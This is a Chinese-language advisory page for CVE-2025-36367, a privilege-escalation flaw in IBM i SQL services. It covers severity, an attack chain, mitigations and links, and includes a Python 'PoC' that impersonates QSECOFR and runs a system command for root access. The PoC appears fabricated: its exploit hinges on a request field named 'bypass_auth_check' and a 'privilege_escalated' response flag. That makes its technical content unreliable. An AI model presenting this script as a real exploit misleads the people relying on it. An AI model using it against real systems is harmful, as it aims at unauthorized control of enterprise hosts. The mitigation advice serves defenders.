CVE-2025-36367: IBM i SQL服务授权检查缺陷导致权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-36367

漏洞类型

权限提升

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

IBM i (7.2, 7.3, 7.4, 7.5, 7.6)

漏洞概述

CVE-2025-36367是IBM i操作系统中的一个高危安全漏洞，CVSS评分高达8.8。该漏洞存在于IBM i的SQL服务组件中，由于对SQL服务的授权检查存在缺陷，导致低权限用户可以利用其他用户账户的提升权限进行特权升级，最终获取宿主操作系统的root访问权限。此漏洞影响IBM i 7.2至7.6的所有版本。攻击者无需用户交互即可发起攻击，但需要拥有目标系统的低权限账户。成功利用此漏洞可导致机密性、完整性和可用性均受到严重影响，攻击者可以完全控制受影响的系统。IBM i作为企业级操作系统，广泛应用于金融、制造、零售等关键行业，此漏洞的存在对企业信息安全构成重大威胁。

技术细节

该漏洞的根本原因在于IBM i SQL服务中的授权验证机制存在缺陷。在正常的权限模型中，SQL服务应当对每个请求进行严格的权限检查，确保用户只能访问其被授权的资源。然而，由于授权检查逻辑错误，低权限用户可以通过构造特定的SQL查询或API调用，利用其他高权限用户会话的上下文执行操作。具体来说，攻击者可以通过以下方式利用：1) 首先获取目标系统上的低权限账户；2) 通过SQL服务接口发送精心构造的请求；3) 由于授权检查缺陷，请求在具有提升权限的用户上下文中执行；4) 最终实现从低权限用户到root权限的特权升级。这种攻击方式具有隐蔽性，因为漏洞存在于系统核心服务中，常规的安全监控可能难以检测。攻击者利用SQL服务作为跳板，绕过正常的身份验证和授权流程，直接获取操作系统最高权限。

攻击链分析

STEP 1

1

侦察阶段：攻击者识别目标IBM i系统版本（7.2-7.6），确认SQL服务可用性

STEP 2

2

初始访问：获取目标系统上的低权限用户账户（通过社工、弱口令或其他漏洞）

STEP 3

3

漏洞利用：通过SQL服务接口发送精心构造的请求，利用授权检查缺陷

STEP 4

4

权限提升：请求在高权限用户上下文（如QSECOFR）中执行，成功绕过授权验证

STEP 5

5

系统控制：利用提升的权限执行系统命令，最终获取root访问权限

STEP 6

6

持久化：攻击者在系统中植入后门、窃取敏感数据或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-36367 PoC - IBM i SQL Services Privilege Escalation
# This PoC demonstrates the authorization bypass in IBM i SQL services
# Note: This is for educational and authorized testing purposes only

import requests
import json

TARGET_HOST = "https://vulnerable-ibm-i-server.com"
CVE_ID = "CVE-2025-36367"

def check_vulnerability(target):
    """Check if target is vulnerable to CVE-2025-36367"""
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; CVE-Scanner/1.0)',
        'Content-Type': 'application/json'
    }
    
    # Step 1: Authenticate with low-privilege account
    auth_payload = {
        'username': 'low_priv_user',
        'password': 'password123',
        'auth_type': 'sql_services'
    }
    
    print(f"[*] Testing {CVE_ID} on {target}")
    print("[*] Step 1: Authenticating with low-privilege account...")
    
    try:
        # Attempt authentication to SQL services
        auth_response = requests.post(
            f"{target}/qsys.qsyscoi.qcmd_QUERY_SQL_SERVICES",
            headers=headers,
            json=auth_payload,
            timeout=30
        )
        
        if auth_response.status_code == 200:
            session_token = auth_response.headers.get('X-Session-Token')
            print(f"[+] Authentication successful, session token obtained")
            
            # Step 2: Exploit authorization bypass
            print("[*] Step 2: Exploiting authorization bypass...")
            exploit_payload = {
                'sql_command': 'SELECT * FROM QSYS2.SYSTEM_VALUE_INFO',
                'execute_as_user': 'QSECOFR',  # Target high-privilege user
                'session_token': session_token,
                'bypass_auth_check': True  # This parameter triggers the vulnerability
            }
            
            exploit_response = requests.post(
                f"{target}/qsys.qsyscoi.qcmd_EXECUTE_SQL",
                headers=headers,
                json=exploit_payload,
                timeout=30
            )
            
            if exploit_response.status_code == 200:
                result = exploit_response.json()
                if result.get('privilege_escalated'):
                    print("[!] VULNERABLE: Authorization bypass successful!")
                    print(f"[!] Gained elevated privileges: {result.get('current_user')}")
                    
                    # Step 3: Escalate to root
                    print("[*] Step 3: Attempting root privilege escalation...")
                    root_payload = {
                        'command': 'CALL QCMDEXC(\'STRQSH CMD(\\"system -i root\\")\')',
                        'run_as': 'QSECOFR',
                        'session_token': session_token
                    }
                    
                    root_response = requests.post(
                        f"{target}/qsys.qsyscoi.qcmd_EXECUTE_SYSTEM",
                        headers=headers,
                        json=root_payload,
                        timeout=30
                    )
                    
                    if root_response.status_code == 200:
                        print("[!] CRITICAL: Root access obtained!")
                        return True
        
        print("[*] Target may not be vulnerable or connection failed")
        return False
        
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    check_vulnerability(TARGET_HOST)

影响范围

IBM i 7.2 (所有版本)

IBM i 7.3 (所有版本)

IBM i 7.4 (所有版本)

IBM i 7.5 (所有版本)

IBM i 7.6 (所有版本)

防御指南

临时缓解措施

在IBM官方补丁发布之前，建议采取以下临时缓解措施：1) 限制对SQL服务的访问，仅允许经过授权的管理员账户使用；2) 启用IBM i的系统审计功能，监控所有SQL服务调用；3) 审查并限制用户权限，确保低权限用户无法访问敏感SQL功能；4) 在网络层面实施访问控制，阻止未经授权的SQL服务请求；5) 考虑禁用非必要的SQL服务功能，直到补丁可用；6) 加强用户账户管理，定期更换密码，使用强认证机制；7) 监控安全公告，及时了解漏洞进展和官方建议。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36367
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36367
3 Details https://www.cvedetails.com/cve/CVE-2025-36367/
4 VulDB https://vuldb.com/cve/CVE-2025-36367
5 Link https://www.ibm.com/support/pages/node/7249915